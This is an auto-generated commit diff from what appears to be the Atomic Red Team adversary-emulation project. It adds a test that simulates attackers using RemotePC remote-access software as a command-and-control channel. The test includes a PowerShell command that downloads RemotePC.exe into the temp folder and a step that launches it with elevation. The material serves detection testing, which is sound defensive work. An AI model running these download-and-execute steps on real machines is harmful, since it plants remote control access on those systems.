Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

2022-04-20 02:40:38 +00:00
parent 36248625a9
commit a089e2f7ec
6 changed files with 106 additions and 0 deletions
@@ -1131,6 +1131,7 @@ command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test o
 command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell
 command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
 command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
+command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
 command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
 command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
 command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
@@ -710,6 +710,7 @@ command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test o
 command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell
 command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
 command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
+command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
 command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
 command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
 command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
@@ -1861,6 +1861,7 @@
  - Atomic Test #4: GoToAssist Files Detected Test on Windows [windows]
  - Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
  - Atomic Test #6: Ammyy Admin Software Execution [windows]
+  - Atomic Test #7: RemotePC Software Execution [windows]
 - [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
  - Atomic Test #1: Base64 Encoded data. [macos, linux]
  - Atomic Test #2: XOR Encoded data. [windows]
@@ -1169,6 +1169,7 @@
  - Atomic Test #4: GoToAssist Files Detected Test on Windows [windows]
  - Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
  - Atomic Test #6: Ammyy Admin Software Execution [windows]
+  - Atomic Test #7: RemotePC Software Execution [windows]
 - [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
  - Atomic Test #2: XOR Encoded data. [windows]
 - T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -76398,6 +76398,47 @@ command-and-control:
 '
        name: powershell
        elevation_required: true
+    - name: RemotePC Software Execution
+      auto_generated_guid: fbff3f1f-b0bf-448e-840f-7e1687affdce
+      description: "An adversary may attempt to trick the user into downloading RemotePC
+        Software for use as a C2 channel. \nUpon successful execution, RemotePC will
+        be executed. \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        RemotePC_Path:
+          description: Path of RemotePC executable
+          type: Path
+          default: "$env:temp\\RemotePC.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'RemotePC must exist on disk at the specified location (#{RemotePC_Path})
+
+'
+        prereq_command: 'if (Test-Path #{RemotePC_Path}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Start-BitsTransfer -Source "https://static.remotepc.com/downloads/rpc/140422/RemotePC.exe"
+          -Destination "#{RemotePC_Path}" -dynamic
+
+'
+      executor:
+        command: 'Start-Process #{RemotePC_Path}
+
+'
+        cleanup_command: "Unregister-ScheduledTask -TaskName \"RemotePC\" -Confirm:$False
+          -ErrorAction SilentlyContinue\nUnregister-ScheduledTask -TaskName \"RPCServiceHealthCheck\"
+          -Confirm:$False -ErrorAction SilentlyContinue\nUnregister-ScheduledTask
+          -TaskName \"ServiceMonitor\" -Confirm:$False -ErrorAction SilentlyContinue\nUnregister-ScheduledTask
+          -TaskName \"StartRPCService\" -Confirm:$False -ErrorAction SilentlyContinue
+          \     \nStop-Process -Name \"RemotePCPerformance\" -force -erroraction silentlycontinue\nStop-Process
+          -Name \"RPCPerformanceService\" -force -erroraction silentlycontinue\nStop-Process
+          -Name \"RemotePCUIU\" -force -erroraction silentlycontinue\nStop-Process
+          -Name \"RPCDownloader\" -force -erroraction silentlycontinue\nStop-Process
+          -Name \"RemotePCService\" -force -erroraction silentlycontinue\nStop-Process
+          -Name \"RPCService\" -force -erroraction silentlycontinue\n"
+        name: powershell
+        elevation_required: true
  T1132.001:
    technique:
      object_marking_refs:
@@ -20,6 +20,8 @@ Admin tools such as TeamViewer have been used by several groups targeting instit

 - [Atomic Test #6 - Ammyy Admin Software Execution](#atomic-test-6---ammyy-admin-software-execution)

+- [Atomic Test #7 - RemotePC Software Execution](#atomic-test-7---remotepc-software-execution)
+

 <br/>

@@ -250,4 +252,63 @@ Start-BitsTransfer -Source "https://web.archive.org/web/20140625232737/http://ww



+<br/>
+<br/>
+
+## Atomic Test #7 - RemotePC Software Execution
+An adversary may attempt to trick the user into downloading RemotePC Software for use as a C2 channel. 
+Upon successful execution, RemotePC will be executed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** fbff3f1f-b0bf-448e-840f-7e1687affdce
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| RemotePC_Path | Path of RemotePC executable | Path | $env:temp&#92;RemotePC.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Start-Process #{RemotePC_Path}
+```
+
+#### Cleanup Commands:
+```powershell
+Unregister-ScheduledTask -TaskName "RemotePC" -Confirm:$False -ErrorAction SilentlyContinue
+Unregister-ScheduledTask -TaskName "RPCServiceHealthCheck" -Confirm:$False -ErrorAction SilentlyContinue
+Unregister-ScheduledTask -TaskName "ServiceMonitor" -Confirm:$False -ErrorAction SilentlyContinue
+Unregister-ScheduledTask -TaskName "StartRPCService" -Confirm:$False -ErrorAction SilentlyContinue      
+Stop-Process -Name "RemotePCPerformance" -force -erroraction silentlycontinue
+Stop-Process -Name "RPCPerformanceService" -force -erroraction silentlycontinue
+Stop-Process -Name "RemotePCUIU" -force -erroraction silentlycontinue
+Stop-Process -Name "RPCDownloader" -force -erroraction silentlycontinue
+Stop-Process -Name "RemotePCService" -force -erroraction silentlycontinue
+Stop-Process -Name "RPCService" -force -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: RemotePC must exist on disk at the specified location (#{RemotePC_Path})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{RemotePC_Path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Start-BitsTransfer -Source "https://static.remotepc.com/downloads/rpc/140422/RemotePC.exe" -Destination "#{RemotePC_Path}" -dynamic
+```
+
+
+
+
 <br/>